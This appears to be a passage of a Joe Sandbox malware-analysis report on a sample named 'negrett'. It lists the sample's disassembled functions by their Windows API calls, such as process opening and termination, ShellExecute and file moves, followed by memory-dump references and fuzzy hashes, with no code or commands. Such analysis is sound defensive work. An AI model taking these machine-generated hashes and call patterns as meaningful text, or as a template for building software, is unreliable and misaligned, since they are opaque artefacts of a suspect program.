                                                • EnableWindow.USER32(00000000,00000001), ref: 00BA830B
                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BA832F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: ffd5bcd36fa9d5a6ad9dba2ef82fdd979131b40e6979f6feadda633db085b243
                                                • Instruction ID: 79e165a555bd99810542fef9a81736015ef86ef7c9ef42997015faf39fce6557
                                                • Opcode Fuzzy Hash: ffd5bcd36fa9d5a6ad9dba2ef82fdd979131b40e6979f6feadda633db085b243
                                                • Instruction Fuzzy Hash: CB418134605644EFDF26CF19D899BA47BE0FB4B714F1841E9E6484F6A2CB31A851CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00B74C95
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B74CB2
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B74CEA
                                                • _wcslen.LIBCMT ref: 00B74D08
                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00B74D10
                                                • _wcsstr.LIBVCRUNTIME ref: 00B74D1A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                • String ID:
                                                • API String ID: 72514467-0
                                                • Opcode ID: a27d89363729ec6e4e6f583f9b6394e7a36d0baa0671925d628ebc0860d2c5c1
                                                • Instruction ID: c31d8b8f5f5486cb46e961748fcaf7ab4b802f252a2753ef841c50686c184463
                                                • Opcode Fuzzy Hash: a27d89363729ec6e4e6f583f9b6394e7a36d0baa0671925d628ebc0860d2c5c1
                                                • Instruction Fuzzy Hash: 5821D731204215BBEB269B39AC4AE7B7FECDF46751F1080B9F809DB191EF61DC0096A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,00B45686,00B53CD6,?,00000000,?,00B45B6A,?,?,?,?,?,00B3E6D1,?,00BD8A48), ref: 00B42D78
                                                • _free.LIBCMT ref: 00B42DAB
                                                • _free.LIBCMT ref: 00B42DD3
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00B3E6D1,?,00BD8A48,00000010,00B14F4A,?,?,00000000,00B53CD6), ref: 00B42DE0
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00B3E6D1,?,00BD8A48,00000010,00B14F4A,?,?,00000000,00B53CD6), ref: 00B42DEC
                                                • _abort.LIBCMT ref: 00B42DF2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: 0a26a21cc662ae4df9cf6d39baa5ffb60314699eaeeaaba81f2777c95a5e4aed
                                                • Instruction ID: f17b6707fd4ca93e628d46fdcd40011848e2b5f62cfd42f91b9a45687f5889bf
                                                • Opcode Fuzzy Hash: 0a26a21cc662ae4df9cf6d39baa5ffb60314699eaeeaaba81f2777c95a5e4aed
                                                • Instruction Fuzzy Hash: B9F0A435905A0137D6126739AC0AB1A2AE9EFC27A1B6445B9F824932A2EF748B017260
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00B29693
                                                  • Part of subcall function 00B29639: SelectObject.GDI32(?,00000000), ref: 00B296A2
                                                  • Part of subcall function 00B29639: BeginPath.GDI32(?), ref: 00B296B9
                                                  • Part of subcall function 00B29639: SelectObject.GDI32(?,00000000), ref: 00B296E2
                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00BA8A4E
                                                • LineTo.GDI32(?,00000003,00000000), ref: 00BA8A62
                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00BA8A70
                                                • LineTo.GDI32(?,00000000,00000003), ref: 00BA8A80
                                                • EndPath.GDI32(?), ref: 00BA8A90
                                                • StrokePath.GDI32(?), ref: 00BA8AA0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                • String ID:
                                                • API String ID: 43455801-0
                                                • Opcode ID: 38bdf5f1d90735b002ef17f19ba8ffeb12e75546e068a3889e8b7a4b650ed532
                                                • Instruction ID: 7dea3e6a1e0d20900c207256d02b7812e019cc9bf839de5f5c6e38fe3dacc85e
                                                • Opcode Fuzzy Hash: 38bdf5f1d90735b002ef17f19ba8ffeb12e75546e068a3889e8b7a4b650ed532
                                                • Instruction Fuzzy Hash: 1611177600414CFFEF129F94DC89EAA7FACEB09350F008062BA199A1A1CB719D55DFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32 ref: 00B7EB30
                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B7EB46
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00B7EB55
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B7EB64
                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B7EB6E
                                                • CloseHandle.KERNEL32(00000000), ref: 00B7EB75
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                • String ID:
                                                • API String ID: 839392675-0
                                                • Opcode ID: 95d4c37fe6c92bd85151441686b730f378876021324e64d7af0604f1bdbc7a61
                                                • Instruction ID: ed54e271e3c6188bb72424dfe6fe8e66c455dbc1e73f2609c1366ee50d9dfe09
                                                • Opcode Fuzzy Hash: 95d4c37fe6c92bd85151441686b730f378876021324e64d7af0604f1bdbc7a61
                                                • Instruction Fuzzy Hash: BFF01772240158BBE6219B669C0EEAF3E7CEFCBB11F004159F611E2191EBA05A0186B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 029DB2B3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: D%M$D%M$D%M$D%MD%M
                                                • API String ID: 1385522511-4071987705
                                                • Opcode ID: 704af88bb10ac0a95ef641293cb67e0680fab3b8c6544be95fb9a40e23f24687
                                                • Instruction ID: 49534c78acd373a65d61dfc6bbffe2f0f439de26731ba967d2927ba78928f2fe
                                                • Opcode Fuzzy Hash: 704af88bb10ac0a95ef641293cb67e0680fab3b8c6544be95fb9a40e23f24687
                                                • Instruction Fuzzy Hash: 4B917B75A0020ADFCB18CF98C4A0AAEB7F1FF58318F65856ED951A7350E731E981DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 029D90B3: _wcslen.LIBCMT ref: 029D90BD
                                                  • Part of subcall function 029EF4A3: __onexit.LIBCMT ref: 029EF4A9
                                                • __Init_thread_footer.LIBCMT ref: 02A56FFB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer__onexit_wcslen
                                                • String ID: 5$Gp#M$Gp#M$p#M
                                                • API String ID: 1352291845-2426839514
                                                • Opcode ID: 52af77334cb74d662cbee44ec2f3bb6619df7e121b38913d574f9a33a2bb1dd2
                                                • Instruction ID: 63a85d3148c779b9f3f6b731d22d41f7b15abd93612dab810415700411694064
                                                • Opcode Fuzzy Hash: 52af77334cb74d662cbee44ec2f3bb6619df7e121b38913d574f9a33a2bb1dd2
                                                • Instruction Fuzzy Hash: 66917B70A00219EFCB15EF94D990DAEB7B6FF49304F10805AEC06AB2A1DB71AE45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B17620: _wcslen.LIBCMT ref: 00B17625
                                                • GetMenuItemInfoW.USER32 ref: 00B7C6EE
                                                • _wcslen.LIBCMT ref: 00B7C735
                                                • SetMenuItemInfoW.USER32 ref: 00B7C79C
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B7C7CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info_wcslen$Default
                                                • String ID: 0
                                                • API String ID: 1227352736-4108050209
                                                • Opcode ID: 93395b892a28984e0fd96f493a8fb83189f0a21b48e31e15413b45eb7a148da4
                                                • Instruction ID: 42e5236fd41bf5cc1f0f2e2b355be7e9876a73a6fa80085934fe30d2466adcb2
                                                • Opcode Fuzzy Hash: 93395b892a28984e0fd96f493a8fb83189f0a21b48e31e15413b45eb7a148da4
                                                • Instruction Fuzzy Hash: 9251EE716043019BD7199F28C885B6B7BE8EF89310F148AADF9A9E31A0DB70DD049B52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00B9AEA3
                                                  • Part of subcall function 00B17620: _wcslen.LIBCMT ref: 00B17625
                                                • GetProcessId.KERNEL32(00000000), ref: 00B9AF38
                                                • CloseHandle.KERNEL32(00000000), ref: 00B9AF67
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                • String ID: <$@
                                                • API String ID: 146682121-1426351568
                                                • Opcode ID: 2ec043206ffc3bfcab8c8ed0e876b094b4c2a266b716505dda17e618b35ab879
                                                • Instruction ID: 27bfce18af200ec6275a79a4624b134e365e836cb06cfe01f7348f619cc0b463
                                                • Opcode Fuzzy Hash: 2ec043206ffc3bfcab8c8ed0e876b094b4c2a266b716505dda17e618b35ab879
                                                • Instruction Fuzzy Hash: F2713570A00619DFCF14EF54C494A9EBBF1EF08314F1484A9E81AAB292CB75ED85CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B34D1E,00B428E9,?,00B34CBE,00B428E9,00BD88B8,0000000C,00B34E15,00B428E9,00000002), ref: 00B34D8D
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00B34D1E,00B428E9,?,00B34CBE,00B428E9,00BD88B8,0000000C,00B34E15,00B428E9,00000002), ref: 00B34DA0
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00B34D1E,00B428E9,?,00B34CBE,00B428E9,00BD88B8,0000000C,00B34E15,00B428E9,00000002,00000000), ref: 00B34DC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: afc3750c3edaec38e7aded86f00e0d113c1b5880d79f3e4b9b101a933106aff7
                                                • Instruction ID: b5e2f781cb677d859eee80c9b2a5bbedfe490ef23e39f1ba117159265716c274
                                                • Opcode Fuzzy Hash: afc3750c3edaec38e7aded86f00e0d113c1b5880d79f3e4b9b101a933106aff7
                                                • Instruction Fuzzy Hash: 5BF03C34A50208ABDB119B95DC4ABAEBFE5EF44751F1001A4E80AA3260DF70AD40CA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID:
                                                • API String ID: 176396367-0
                                                • Opcode ID: 8bb47df1574b82508a8568e42ad549eacc8411e96a2d4b59b127870c91da2114
                                                • Instruction ID: 6f36dd869536fcdf7bc4c539c5e55c53a2745d4554481fc07a96ab0b3ac48542
                                                • Opcode Fuzzy Hash: 8bb47df1574b82508a8568e42ad549eacc8411e96a2d4b59b127870c91da2114
                                                • Instruction Fuzzy Hash: EBF19D71604350DFCB15EF24C890B6BBBE6AF85314F14855DE88A9B2A2CF35E845CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 00B9A427
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B9A435
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B9A468
                                                • CloseHandle.KERNEL32(?), ref: 00B9A63D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                • String ID:
                                                • API String ID: 3488606520-0
                                                • Opcode ID: de856f311391644930f38d4f0c870798dbc7bc02590da363a6e5e361beabbbc8
                                                • Instruction ID: 7886c9182540e4b44d482401d3b3b33479e2c4af5cc6ee29daa90b49ff1bfcbd
                                                • Opcode Fuzzy Hash: de856f311391644930f38d4f0c870798dbc7bc02590da363a6e5e361beabbbc8
                                                • Instruction Fuzzy Hash: 71A180716043009FDB20DF24D886F2AB7E5AF94714F5488ADF5599B392DB70EC418B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B7DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B7CF22,?), ref: 00B7DDFD
                                                  • Part of subcall function 00B7DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B7CF22,?), ref: 00B7DE16
                                                  • Part of subcall function 00B7E199: GetFileAttributesW.KERNEL32(?,00B7CF95), ref: 00B7E19A
                                                • lstrcmpiW.KERNEL32(?,?), ref: 00B7E473
                                                • MoveFileW.KERNEL32 ref: 00B7E4AC
                                                • _wcslen.LIBCMT ref: 00B7E5EB
                                                • _wcslen.LIBCMT ref: 00B7E603
                                                • SHFileOperationW.SHELL32 ref: 00B7E650
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                • String ID:
                                                • API String ID: 3183298772-0
                                                • Opcode ID: 4381f51a22fb0e5dfedb3011f2d5dfb9ad5cf0655dfa4214d8174ad7352de50b
                                                • Instruction ID: d6ebcb0456180c79cb90298e4e4d1540ea75ce7abca2445a070c348fe2effcf6
                                                • Opcode Fuzzy Hash: 4381f51a22fb0e5dfedb3011f2d5dfb9ad5cf0655dfa4214d8174ad7352de50b
                                                • Instruction Fuzzy Hash: C05173B24083859BC724DB90D8819DF73ECEF89340F50499EF5A9D3151EF74E6888766
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00B78BCD
                                                • VariantClear.OLEAUT32 ref: 00B78C3E
                                                • VariantClear.OLEAUT32 ref: 00B78C9D
                                                • VariantClear.OLEAUT32(?), ref: 00B78D10
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B78D3B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$ChangeInitType
                                                • String ID:
                                                • API String ID: 4136290138-0
                                                • Opcode ID: 7a880ebad2fb641654e568d3abd6a6694cd9e0924565eb5af0f9e8eba3eebe48
                                                • Instruction ID: 41580c306243f60af787aa946e7739751482bbc300bfa390d87075bf58a2e5d3
                                                • Opcode Fuzzy Hash: 7a880ebad2fb641654e568d3abd6a6694cd9e0924565eb5af0f9e8eba3eebe48
                                                • Instruction Fuzzy Hash: 19515D75A00219EFCB14CF68C894AAABBF5FF8D310B158569E919DB350DB30E911CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32 ref: 00B88BAE
                                                • GetPrivateProfileSectionW.KERNEL32 ref: 00B88BDA
                                                • WritePrivateProfileSectionW.KERNEL32 ref: 00B88C32
                                                • WritePrivateProfileStringW.KERNEL32 ref: 00B88C57
                                                • WritePrivateProfileStringW.KERNEL32 ref: 00B88C5F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String
                                                • String ID:
                                                • API String ID: 2832842796-0
                                                • Opcode ID: a9675e437eeb38af4bfd7153293294556d1c486829d2b38823eb8770e4cdffb4
                                                • Instruction ID: 55157d433ad2ffae74de960847888a1a7c681d4b839e224caa1378dc0bbe7b15
                                                • Opcode Fuzzy Hash: a9675e437eeb38af4bfd7153293294556d1c486829d2b38823eb8770e4cdffb4
                                                • Instruction Fuzzy Hash: B6513935A00219DFCB15EF64C891AADBBF5FF49314F488498E849AB362DB31ED51CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetWindowLongW.USER32 ref: 00BA6C33
                                                • SetWindowLongW.USER32 ref: 00BA6C4A
                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00BA6C73
                                                • ShowWindow.USER32(00000002,00000000), ref: 00BA6C98
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00BA6CC7
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$Long$MessageSendShow
                                                • String ID:
                                                • API String ID: 3688381893-0
                                                • Opcode ID: a80da4220d9d439c69e32235ad817473305817559efea898d4ca59980e2bbd32
                                                • Instruction ID: 7f1ac85eb456b40183589b66d1c1c9e9f180ec8e6018b7f1282b0d56629c5a99
                                                • Opcode Fuzzy Hash: a80da4220d9d439c69e32235ad817473305817559efea898d4ca59980e2bbd32
                                                • Instruction Fuzzy Hash: 3C41B5B5A08104BFD724DF28CC95FA97BE5EB0B360F1902A4F855A72E1D771AD41C650
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                • Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 3890d703f7ea146fcb4efc749df72bd74b23163155a5f2f9b3b7e357d1c9b5e8
                                                • Instruction ID: 52a351b3e89a4a148aa7bac985d5d18ea6ad20ac56b8d61759f1dbe6c1afc889
